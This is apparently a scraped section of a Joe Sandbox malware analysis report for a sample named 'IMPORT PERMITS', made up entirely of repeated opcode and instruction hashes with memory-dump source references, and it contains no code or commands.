                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 21f5e0032625120403abc9f7ee7a9e9d7d1544467686e739caa0b22908309ca5
                                                                                                                                • Instruction ID: 0743e48d40fe0caf953a1fc04e12cb0b97789d11507d0ff0ec0fe51ea91dc3e4
                                                                                                                                • Opcode Fuzzy Hash: 21f5e0032625120403abc9f7ee7a9e9d7d1544467686e739caa0b22908309ca5
                                                                                                                                • Instruction Fuzzy Hash: 6A012676245645ABF317A26EDC88F276B8DEF80398F150077FA018B2F0D974DC01C261
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d0b2e17e380720f8ba21add9c8f678e6a3e38ea5a5e39a8ff9f5ca53b9f448d8
                                                                                                                                • Instruction ID: b8b0d8ecdaed0ecbb4b2c7be460ca022db4de7ad5fd19b4fd677acc7e3ecee57
                                                                                                                                • Opcode Fuzzy Hash: d0b2e17e380720f8ba21add9c8f678e6a3e38ea5a5e39a8ff9f5ca53b9f448d8
                                                                                                                                • Instruction Fuzzy Hash: 6D11E036284764AFDB21CF59D888B567BE8EB99768F004119FA24CB790C370E800CFA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 65852675c18840a7aa8ce5a4ccf504f742bdb0018ad94d29f061cb12d6292938
                                                                                                                                • Instruction ID: 06cb72b92b3be5bbe870b666d74b1bf305d3ca19fc400035f1f8fb47360ca543
                                                                                                                                • Opcode Fuzzy Hash: 65852675c18840a7aa8ce5a4ccf504f742bdb0018ad94d29f061cb12d6292938
                                                                                                                                • Instruction Fuzzy Hash: 9011CA362046119FDB219A6DD880F97B7A5FFC4710F19441AE743C77A1DA30E802C7A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b368f2ae472d87f4afc77044521920b8a890a3bf45313d7df3bf9dab6fc76d6
                                                                                                                                • Instruction ID: 18fbe6eb29921d2192e216d6306e4ab817995163fd301430f34fee42be87ae57
                                                                                                                                • Opcode Fuzzy Hash: 8b368f2ae472d87f4afc77044521920b8a890a3bf45313d7df3bf9dab6fc76d6
                                                                                                                                • Instruction Fuzzy Hash: 3B11C276A00716ABDB21DF5DC980B5EFBB8EF84744F52085ADA08A7314D770ED01CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3d468f2a9b8ca795de0c5324a587c6b29c6b30a57871d75d37c19a9ee551e915
                                                                                                                                • Instruction ID: 3114b31562967d5a5a7db8b51886a32c34e926d87d7b74c613f841b5239aa961
                                                                                                                                • Opcode Fuzzy Hash: 3d468f2a9b8ca795de0c5324a587c6b29c6b30a57871d75d37c19a9ee551e915
                                                                                                                                • Instruction Fuzzy Hash: 7F0192716012099FCB26DB1AE548F16BBF9EB95718F21857AE1059B2B0CB70DC82CF90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                • Instruction ID: e35df9e8708e8d8149f2fa73f23d383705c85f99c60b0699e351cca5fb365179
                                                                                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                • Instruction Fuzzy Hash: 0B11E5722056C29BF723976DD954B267B94AB00748F1908B2EE41A77F2F739C857C250
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                • Instruction ID: d73621024f882277d6b7a15369ab5dbbb0b1447ff04b01b2e88e7e1c88320554
                                                                                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                • Instruction Fuzzy Hash: 7F01D67A600205AFE721DF5AC804F577AEDEF50B5AF058027EA05AB270D779DD40C791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                • Instruction ID: 24d8643e594120bf1fa21915bfa6026dbf7c328ca8ea47ac24050512ed43de96
                                                                                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                • Instruction Fuzzy Hash: BD0149735047269BCB318F1AE940A367BF8FF55764700892DFD958B681C332D400CB60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a912855958bf287c691890a08eb4332643e1cd811773bc0fa19b752c4252288d
                                                                                                                                • Instruction ID: 4ce245712b33aef562edabca722fb83e9cef0d63a3db334315b54185d81052e5
                                                                                                                                • Opcode Fuzzy Hash: a912855958bf287c691890a08eb4332643e1cd811773bc0fa19b752c4252288d
                                                                                                                                • Instruction Fuzzy Hash: FD01D472B00509DBD714EB6EEC009AEB7BCFF90618F05406AD902A7664EE30EC01C691
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: cf08e4092085fcba8049c9512ede3cb20ba65b9c0dc3e780924f0adc48ee6602
                                                                                                                                • Instruction ID: 100face864b8ef92ef74af85dced9cd8723223f45c9f69f4b87756833444081b
                                                                                                                                • Opcode Fuzzy Hash: cf08e4092085fcba8049c9512ede3cb20ba65b9c0dc3e780924f0adc48ee6602
                                                                                                                                • Instruction Fuzzy Hash: BA018FB1241601AFD731AF1AD840F06BAA8AF65B50F12442FF31AAB3A0D6B0D8418B64
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3dd4fa73af9c01f6144c5c14c646eb4fec85a3201c5a45e2ec247c6c675754bb
                                                                                                                                • Instruction ID: 2199c3f952eb07d2d1ce0cd0ea33cc0534a57ef84a507074c99c9444fdb5bea9
                                                                                                                                • Opcode Fuzzy Hash: 3dd4fa73af9c01f6144c5c14c646eb4fec85a3201c5a45e2ec247c6c675754bb
                                                                                                                                • Instruction Fuzzy Hash: A1F0F932641721F7C7319B5A8D44F57BEEDEB84A94F114029A60697690C630DD01C6A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                • Instruction ID: e0e227456793bf53cdd35f2a507fc8c8df5455a90e439f7dfe8fd5d7ff61435b
                                                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                • Instruction Fuzzy Hash: 8CF0C8F2600615ABD325CF4EDC80E57FBEADBD1A80F048169E515C7320EA31DD04CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5325108717ff64ce64804bbdc98740dad636062d006fee5229077354c974d831
                                                                                                                                • Instruction ID: 32a949e057d8fb3ddc36d0ee99ec96c3586dfd3dd21d8f8c9fd2cd9f5655d82a
                                                                                                                                • Opcode Fuzzy Hash: 5325108717ff64ce64804bbdc98740dad636062d006fee5229077354c974d831
                                                                                                                                • Instruction Fuzzy Hash: 69012C71A11219ABDB04DFAAD551AAEBBF8FF58304F11406AF904E73A0D6749A018BA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                • Instruction ID: 2311624f28daf4b7dd10d25ab3236b84bc121259797082cbe852a36e6ee8a6c2
                                                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                • Instruction Fuzzy Hash: 1CF081732646339BD733166D6840B6BB5998FD1A6CF1A103DF2099B644CD78CD01D3D0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 686653ea59b6712fd99cad14ad38d7c3cec4d6843d2ff78dc52ca2a831035d48
                                                                                                                                • Instruction ID: 999b9b39ad7a59bd6f39be6aea8d9c335482ea86ce6fbb9ce6bc5327492259df
                                                                                                                                • Opcode Fuzzy Hash: 686653ea59b6712fd99cad14ad38d7c3cec4d6843d2ff78dc52ca2a831035d48
                                                                                                                                • Instruction Fuzzy Hash: 5E012171A10219ABDB04DFA9D4519AEB7F8EF58304F55405AF904E7351D6749901CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f9b7d9aed3a67a8611624b3896ef8fd84e0a9ace495e0da53c8dc2ab5d9eaf3e
                                                                                                                                • Instruction ID: bc085f15dd8699bc455300bd7f4354fe6fe2458bc6ae5a4035246058c0f10b6b
                                                                                                                                • Opcode Fuzzy Hash: f9b7d9aed3a67a8611624b3896ef8fd84e0a9ace495e0da53c8dc2ab5d9eaf3e
                                                                                                                                • Instruction Fuzzy Hash: D3012171A01219ABDB04DFA9D44199EBBF8EF58304F51405AF914E7390D674D9018BA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                • Instruction ID: ffcf075536a0783dbc9802ffd5b493200f9668f2135153ddd8b639faa7972603
                                                                                                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                • Instruction Fuzzy Hash: 1E01D1322446869BD323D65EC845B5ABF98EF52794F0840ABFE448B7B2EA78C801C211
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 368d48fdc10b62ac8fb2ba83fb267dfdddededf2aa492bb54ede51ecd512c410
                                                                                                                                • Instruction ID: fee2076abc5ce6d4a5ee7bddd3e60e724b15c6eddfeeb8b408169ca09512634a
                                                                                                                                • Opcode Fuzzy Hash: 368d48fdc10b62ac8fb2ba83fb267dfdddededf2aa492bb54ede51ecd512c410
                                                                                                                                • Instruction Fuzzy Hash: 5F017C71A002599FDB04DFA9D441AEEBBB8EF58310F15005AE900A7290D734EA01CBA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                • Instruction ID: a671a761f4186fe3ac7b755c90f3295d7240ecb4a103fedd13731fb519d9e7de
                                                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                • Instruction Fuzzy Hash: 98F01D7220001EBFEF029F95DD80DAF7B7EEB59298B114129FA1192170D631DE21ABA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8da074f355cb3f6caeb67b3c97fd30cc82f5887ddbd71e9d7408e7f2a9a3f4e7
                                                                                                                                • Instruction ID: 285ce34df07eaa788b58979b66ee413c82c811eba2754fcacf49b8fb062db760
                                                                                                                                • Opcode Fuzzy Hash: 8da074f355cb3f6caeb67b3c97fd30cc82f5887ddbd71e9d7408e7f2a9a3f4e7
                                                                                                                                • Instruction Fuzzy Hash: 41018936111519ABCF129E84DC40EDE7F6AFB4C658F058116FE1866220C732D971EB82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 16d021424c5027b7d8f3c8822543649aa8fca8f16a156147192ecf6b03cf1108
                                                                                                                                • Instruction ID: fb7f362c08570d7062f24186294d8ba5aff6b90f2b1b4c2ea1587d454388d775
                                                                                                                                • Opcode Fuzzy Hash: 16d021424c5027b7d8f3c8822543649aa8fca8f16a156147192ecf6b03cf1108
                                                                                                                                • Instruction Fuzzy Hash: 7CF02473624262ABF7109629AC42B62329AE7D0658F25902EEB058BAC1F970DC05C3A4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
Memory Dump Source
• Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 30bced94cbc2505ea376cf6cf78354b76cce93d0a9b888aa34bba8ab42df4454
                                                                                                                                • Instruction ID: f8abecd3445c4f4955a34f819a006587d6ce9b492aae137dcbc9dedeb2feeb25
                                                                                                                                • Opcode Fuzzy Hash: 30bced94cbc2505ea376cf6cf78354b76cce93d0a9b888aa34bba8ab42df4454
                                                                                                                                • Instruction Fuzzy Hash: FF90026160150142414071584804406A015A7F5301395C216B0558561CC7288956A369
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f778b6bb3fb22bf64a6bab764e1cdc0ac667b919deb2a2e96e004abd13601787
                                                                                                                                • Instruction ID: 8903cc4c73dc2c0898de3018ef0875d595758e46040844eb68ebbf4c0b516668
                                                                                                                                • Opcode Fuzzy Hash: f778b6bb3fb22bf64a6bab764e1cdc0ac667b919deb2a2e96e004abd13601787
                                                                                                                                • Instruction Fuzzy Hash: BD90023120544942D14071584404A46402597E4305F55C112B0068695DD7358E56B761
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6fa1862f6f73bc7b88701fddbff5e8f50d2ebcbe4826054285a63210e36afead
                                                                                                                                • Instruction ID: 28ebfb8b88bd57ee2a1ad15e7383e8e95e4e2f268f74eb741dc159636ddc5146
                                                                                                                                • Opcode Fuzzy Hash: 6fa1862f6f73bc7b88701fddbff5e8f50d2ebcbe4826054285a63210e36afead
                                                                                                                                • Instruction Fuzzy Hash: 3E90023120140902D1807158440464A401597E5301F95C116B0029655DCB258B5A77A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 13514f6c0d176fcaa914c8bbd7274d5b554d020aec8b29999315347730566ec2
                                                                                                                                • Instruction ID: 7430c19b19d8ed4688abee2f0d9c2097cb3073351078376a4f1123b83a051543
                                                                                                                                • Opcode Fuzzy Hash: 13514f6c0d176fcaa914c8bbd7274d5b554d020aec8b29999315347730566ec2
                                                                                                                                • Instruction Fuzzy Hash: E790023120140902D10471584804686401597E4301F55C112B6028656ED77589927231
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c909de3138171fd38ca2ccdb1ebf60e9b3759ebabcb0250c00962552d1167b5
                                                                                                                                • Instruction ID: d714ce3de732fe5848ce540e34380a2a66dd0455487e07365727fb2bca04a1ea
                                                                                                                                • Opcode Fuzzy Hash: 3c909de3138171fd38ca2ccdb1ebf60e9b3759ebabcb0250c00962552d1167b5
                                                                                                                                • Instruction Fuzzy Hash: F190023160540902D15071584414746401597E4301F55C112B0028655DC7658B5677A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c887c343bfe8b8e935d7cad4c6adba2de27e40675fabba4f64b503ea7f21c9f3
                                                                                                                                • Instruction ID: b4b24602eff4de75b32a9a2584020c276a37e16691a9c1f26dbbc244403c584b
                                                                                                                                • Opcode Fuzzy Hash: c887c343bfe8b8e935d7cad4c6adba2de27e40675fabba4f64b503ea7f21c9f3
                                                                                                                                • Instruction Fuzzy Hash: 16900225211401030105B5580704507405697E9351355C122F1019551CD73189626221
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aa460292f46ae8d78622d8eb1eab3c9de9de88f2e347555704302323b29237b0
                                                                                                                                • Instruction ID: 095b08fee13635d97f9c1557f1667492553fe8fec348cc6c81352ef639dbf739
                                                                                                                                • Opcode Fuzzy Hash: aa460292f46ae8d78622d8eb1eab3c9de9de88f2e347555704302323b29237b0
                                                                                                                                • Instruction Fuzzy Hash: 9D900225221401020145B558060450B4455A7EA351395C116F141A591CC73189666321
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fe90916fed09c4d5beae8cd244841ad7f4c210d5384b8068303c3962350687cb
                                                                                                                                • Instruction ID: 82796e9b5a94e9c014e7b4c54e9706a0a352edb533a7fb15c8ad7b86eeb2f13c
                                                                                                                                • Opcode Fuzzy Hash: fe90916fed09c4d5beae8cd244841ad7f4c210d5384b8068303c3962350687cb
                                                                                                                                • Instruction Fuzzy Hash: 3B9002A1201541924500B2588404B0A851597F4201B55C117F1058561CC6358952A235
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 85a521fcff56d28cfd55deedaffbbc0c0ff9742a17226d31fe28c368ec7c41e8
                                                                                                                                • Instruction ID: 4ac6ba9f2ea37fd31df13267f69e373afc8c23867511cec58520bc508213e7e0
                                                                                                                                • Opcode Fuzzy Hash: 85a521fcff56d28cfd55deedaffbbc0c0ff9742a17226d31fe28c368ec7c41e8
                                                                                                                                • Instruction Fuzzy Hash: 0290022120544542D10075585408A06401597E4205F55D112B1068596DC7358952B231
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4606da8e407edd9629e84f4c87479812112a3ee3ae9370cb3b4a2d32e7280959
                                                                                                                                • Instruction ID: eef23911ab47611092d7405d2416cd29797417d987704e45f6ae192bdd502639
                                                                                                                                • Opcode Fuzzy Hash: 4606da8e407edd9629e84f4c87479812112a3ee3ae9370cb3b4a2d32e7280959
                                                                                                                                • Instruction Fuzzy Hash: 5490022921340102D1807158540860A401597E5202F95D516B0019559CCA25896A6321
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9b01646c5b665e211ad6538158a5c947abd93f621d87ebf3d432f2d4c4014b94
                                                                                                                                • Instruction ID: 57b7152781c643158c65f46c2b5ab1e37b5d4470923a6130e03d42a2b8be198e
